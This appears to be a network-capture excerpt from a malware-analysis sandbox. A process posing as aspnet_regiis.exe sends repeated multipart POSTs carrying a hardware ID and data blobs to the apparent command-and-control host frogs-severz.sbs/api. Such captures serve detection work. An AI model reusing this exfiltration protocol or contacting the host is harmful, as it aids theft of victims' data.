2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 41 58 4a 38 48 76 67 2f 69 55 48 49 44 71 50 42 6f 6d 47 55 76 61 58 68 4d 5a 32 66 5a 68 30 59 51 68 69 33 6c 34 63 35 72 41 38 57 50 32 56 61 2b 7a 54 4d 47 6f 51 4a 71 73 65 74 62 35 75 33 71 65 68 37 31 74 39 71 42 6c 63 65 58 70 4b 44 68 44 36 6f 54 67 39 30 64 68 48 36 4e 59 39 45 77 6b 58 71 67 71 70 39 33 65 76 73 7a 6d 72 65 30 32 5a 46 52 31 52 42 31 6f 75 49 64 66 6b 50 41 6e 31 34 48 66 77 31 6a 30 72 42 41 61 37 48 72 57 32 50 75 36 7a 70 59 38 48 66 61 41 42 55 47 56 69 53 69 6f 30 7a 6f 6b 74 4a 50 7a 77 64 35 48 6a 55 41 75 6b 4a 6f 2b 75 71 66 74 32 73 34 76 63 78 31 4e 4d 68 58 52 67 62 55 35 79 44 69 54 61 6e 54 41 4a 30 64 68 76 37 4d 49 46 51 78 77 71 72 78 71 31 71 6d 37 57 74 34 58 66 55 31 6d 41 4e 58 31 6f 57 31 6f 75 63 64 66 6b Data Ascii: AXJ8Hvg/iUHIDqPBomGUvaXhMZ2fZh0YQhi3l4c5rA8WP2Va+zTMGoQJqsetb5u3qeh71t9qBlceXpKDhD6oTg90dhH6NY9EwkXqgqp93evszmre02ZFR1RB1ouIdfkPAn14Hfw1j0rBAa7HrW2Pu6zpY8HfaABUGViSio0zoktJPzwd5HjUAukJo+uqft2s4vcx1NMhXRgbU5yDiTanTAJ0dhv7MIFQxwqrxq1qm7Wt4XfU1mANX1oW1oucdfk
2024-11-23 09:25:06 UTC	335	IN	Data Raw: 67 33 74 64 4a 6c 42 79 67 75 6a 31 4f 30 72 33 62 7a 73 74 6b 69 54 6c 79 45 36 46 6c 70 41 31 74 54 45 41 4b 4a 42 42 33 5a 71 43 37 45 66 6c 6b 2f 43 45 72 57 43 34 79 57 62 38 2f 53 2b 50 35 50 62 63 45 55 41 53 67 72 4e 32 64 64 69 38 52 30 57 50 32 56 61 36 6e 6a 55 45 49 70 46 74 6f 4c 31 4a 64 71 77 76 76 78 33 30 4d 6c 69 51 6d 59 6b 64 70 47 4b 67 54 4b 78 44 53 64 36 61 42 32 38 64 73 78 4e 68 46 32 64 67 75 55 6c 6f 76 33 73 39 6a 47 4c 6e 31 51 47 56 68 52 66 67 4a 33 4a 47 36 5a 4a 44 48 5a 73 57 4e 49 7a 6d 45 57 45 53 2b 54 45 37 54 33 4e 2f 65 7a 71 59 4a 4f 48 4d 56 63 44 54 77 76 42 33 4e 59 71 37 31 5a 4a 5a 7a 78 43 72 6e 62 4d 55 49 52 64 35 49 57 75 64 34 2b 31 72 2f 68 79 6c 4f 46 66 42 6b 34 58 56 35 32 4e 75 67 75 50 51 67 68 79 Data Ascii: g3tdJlByguj1O0r3bzstkiTlyE6FlpA1tTEAKJBB3ZqC7Eflk/CErWC4yWb8/S+P5PbcEUASgrN2ddi8R0WP2Va6njUEIpFtoL1Jdqwvvx30MliQmYkdpGKgTKxDSd6aB28dsxNhF2dguUlov3s9jGLn1QGVhRfgJ3JG6ZJDHZsWNIzmEWES+TE7T3N/ezqYJOHMVcDTwvB3NYq71ZJZzxCrnbMUIRd5IWud4+1r/hylOFfBk4XV52NuguPQghy
2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 38 30 31 0d 0a 41 6b 34 52 64 5a 49 79 64 50 72 32 2f 63 45 4e 74 4c 76 59 4b 37 4a 63 58 68 34 71 35 6a 6b 34 63 68 51 6c 59 58 57 5a 57 43 68 79 65 7a 53 51 70 6e 66 31 33 43 42 71 31 50 7a 77 6d 70 7a 61 5a 62 6f 35 4b 68 35 58 33 65 30 47 6f 37 5a 67 39 62 6d 49 4b 44 49 37 41 50 52 7a 46 7a 57 71 51 42 7a 41 71 45 4f 75 71 43 74 53 58 46 38 35 6e 74 66 39 33 59 64 78 51 56 4f 31 57 64 67 49 6b 36 71 67 39 48 4d 58 70 61 70 47 6a 43 41 73 41 55 35 4a 72 39 4e 38 62 6d 2f 37 6b 68 67 63 41 76 48 42 67 4d 47 4d 37 65 79 6e 57 7a 44 31 45 78 4f 78 6e 75 4b 6f 70 42 30 67 62 6a 2f 4a 4e 47 69 71 57 6d 39 54 50 31 32 48 41 4d 54 68 64 4b 71 4c 4b 71 4f 4b 42 4d 42 7a 4e 4e 44 50 45 6f 6a 30 66 44 4f 35 72 4d 71 6e 47 61 76 61 72 75 4d 5a 32 66 62 6b 55 41 Data Ascii: 801Ak4RdZIydPr2/cENtLvYK7JcXh4q5jk4chQlYXWZWChyezSQpnf13CBq1PzwmpzaZbo5Kh5X3e0Go7Zg9bmIKDI7APRzFzWqQBzAqEOuqCtSXF85ntf93YdxQVO1WdgIk6qg9HMXpapGjCAsAU5Jr9N8bm/7khgcAvHBgMGM7eynWzD1ExOxnuKopB0gbj/JNGiqWm9TP12HAMThdKqLKqOKBMBzNNDPEoj0fDO5rMqnGavaruMZ2fbkUA
2024-11-23 09:25:06 UTC	687	IN	Data Raw: 54 45 63 71 4a 64 47 33 64 2f 44 50 39 2f 73 6e 7a 69 42 72 58 49 6a 47 69 4e 74 4a 4c 51 5a 4e 44 52 62 77 4a 4f 43 78 6a 59 7a 49 74 31 2b 58 5a 4a 4f 54 41 63 2f 79 37 4d 66 59 70 46 76 49 4c 31 4a 61 69 77 6f 75 42 32 78 63 34 73 49 31 73 4c 55 72 65 42 6c 44 4c 68 41 55 6c 33 50 45 4b 76 64 73 78 47 31 55 58 38 6b 76 38 2b 79 4f 44 37 76 69 50 4d 6b 58 68 46 54 6c 6f 41 78 4d 4c 45 4a 2b 45 58 53 54 5a 2f 43 4f 34 2b 6a 31 54 48 51 70 72 38 6d 47 61 54 76 61 76 34 52 4e 44 4f 59 67 56 54 4a 47 61 33 67 6f 38 79 72 56 6b 33 54 30 6b 5a 38 6a 61 4c 56 4e 56 46 36 6f 4b 69 4a 63 57 4b 37 4b 59 78 37 4a 45 68 48 52 68 43 47 4b 4f 50 69 6a 75 6d 57 52 67 38 53 52 6e 74 4f 34 78 4a 68 45 76 6b 78 4f 30 39 7a 2f 33 73 36 6d 43 54 68 7a 46 58 41 30 38 4c 77 Data Ascii: TEcqJdG3d/DP9/snziBrXIjGiNtJLQZNDRbwJOCxjYzIt1+XZJOTAc/y7MfYpFvIL1JaiwouB2xc4sI1sLUreBlDLhAUl3PEKvdsxG1UX8kv8+yOD7viPMkXhFTloAxMLEJ+EXSTZ/CO4+j1THQpr8mGaTvav4RNDOYgVTJGa3go8yrVk3T0kZ8jaLVNVF6oKiJcWK7KYx7JEhHRhCGKOPijumWRg8SRntO4xJhEvkxO09z/3s6mCThzFXA08Lw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:08 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PIXVMC0RVNH46C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18146 Host: frogs-severz.sbs
2024-11-23 09:25:08 UTC	15331	OUT	Data Raw: 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 50 Data Ascii: --PIXVMC0RVNH46CContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--PIXVMC0RVNH46CContent-Disposition: form-data; name="pid"2--PIXVMC0RVNH46CContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--P
2024-11-23 09:25:08 UTC	2815	OUT	Data Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
2024-11-23 09:25:10 UTC	1010	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ju7mhf50ho716rosrigjho4ouq; expires=Wed, 19-Mar-2025 03:11:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iibSEQHcEZ9NOUBf56L%2Bqeq7dD3GbQcl780O2RLu4dDu9IsWcD9gUhIplVBj8SdVickW5zTTFBbxRgr2hTXgxzrbEb6NZRytEtZWsh3QPGF%2FtNPSwpDXqkse0YGMs43mRW9M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c389bccc448-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=14&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19104&delivery_rate=1926121&cwnd=226&unsent_bytes=0&cid=b8db1a598a82b939&ts=1777&x=0"
2024-11-23 09:25:10 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 09:25:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:11 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1EJD49M7KDWLPUQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8773 Host: frogs-severz.sbs
2024-11-23 09:25:11 UTC	8773	OUT	Data Raw: 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a Data Ascii: --1EJD49M7KDWLPUQContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--1EJD49M7KDWLPUQContent-Disposition: form-data; name="pid"2--1EJD49M7KDWLPUQContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2
2024-11-23 09:25:12 UTC	1013	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vgjpn2mt8bsl7p3dvft9cdc0d0; expires=Wed, 19-Mar-2025 03:11:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BpkY32Ju95ESM3hLmw0OsXCZ%2FwK4vYr%2FzZ%2F1yDU77TbAKrS5xCOLRyXO2tnTJGLmitYbxInKlxy1HcJfJJH7f6B5ItNl2ghG07ERAeXhRm4tBkozOElUJFW%2BS88q8XUCadR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c4c78284337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9709&delivery_rate=1657207&cwnd=215&unsent_bytes=0&cid=32cf5c095307225a&ts=783&x=0"
2024-11-23 09:25:12 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 09:25:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:13 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SEPOOODGTK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20396 Host: frogs-severz.sbs
2024-11-23 09:25:13 UTC	15331	OUT	Data Raw: 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 Data Ascii: --SEPOOODGTKContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--SEPOOODGTKContent-Disposition: form-data; name="pid"3--SEPOOODGTKContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--SEPOOODGTKC
2024-11-23 09:25:13 UTC	5065	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 Data Ascii: lrQMn 64F6(X&7~`aO@
2024-11-23 09:25:14 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9a2ec3n5k2b00v4gdo5flqlmi2; expires=Wed, 19-Mar-2025 03:11:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2TyZmLrqlk%2BAxUyMDydoXu5yzZSPph1AC0nyVvjz0kf%2BpDfGVJxDtnPhxgN19g0howHjpAi1I1Rr%2Bg6%2FvguHLNzJKlBD47oS%2FFhtwOsI1tF84tz945EJVOqT9dvumZ%2FAaPn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c5abf6f8ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1833&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21350&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=1a82acb6cab61812&ts=877&x=0"
2024-11-23 09:25:14 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 09:25:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:16 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=69WLIBOBD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1248 Host: frogs-severz.sbs
2024-11-23 09:25:16 UTC	1248	OUT	Data Raw: 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 Data Ascii: --69WLIBOBDContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--69WLIBOBDContent-Disposition: form-data; name="pid"1--69WLIBOBDContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--69WLIBOBDConte
2024-11-23 09:25:17 UTC	1004	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dpnnorkj6qgrc0oklj0jihh3ud; expires=Wed, 19-Mar-2025 03:11:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNBRmY9CY1aUbF3SCf4p5rSpfATm3tvuml32peungvFEhiGPNCSNx55itHPWbfNXrvTuhzi85%2BFQp37ZAuFOEt9CbSWg3QVthKcWjStQL6kc1Yul0R9dWdH7CXcxzxgcVOrN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c6bfce37295-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1846&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2156&delivery_rate=1599123&cwnd=222&unsent_bytes=0&cid=b3e0ec4fb963377b&ts=719&x=0"
2024-11-23 09:25:17 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 09:25:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:18 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QE9559A41CV3RM9L5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1140 Host: frogs-severz.sbs
2024-11-23 09:25:18 UTC	1140	OUT	Data Raw: 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 Data Ascii: --QE9559A41CV3RM9L5Content-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--QE9559A41CV3RM9L5Content-Disposition: form-data; name="pid"1--QE9559A41CV3RM9L5Content-Disposition: form-data; name="lid"HpOoIh--b8bb860e
2024-11-23 09:25:20 UTC	1009	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=au6rlnttdknii2q4fn0bm3umna; expires=Wed, 19-Mar-2025 03:11:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1t52CmE6Vl%2FalbdPYj5ZKZhaRWDggWHL720XwIErYOH%2B67pCtdQRq3QWD2MqLgYvrv9Gm0zxdfBrN39EYcSJfCSfi5QXNMm0o6DHkMbl1PPjvvnu%2BHhK6UnC2tkZvEOc4OXK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c7968e7de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2056&delivery_rate=1858688&cwnd=225&unsent_bytes=0&cid=0e1ac8fd1cc98cf8&ts=1418&x=0"
2024-11-23 09:25:20 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 09:25:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: frogs-severz.sbs
2024-11-23 09:25:21 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=6590062178D2DEA3FF1C6333321FCDD9
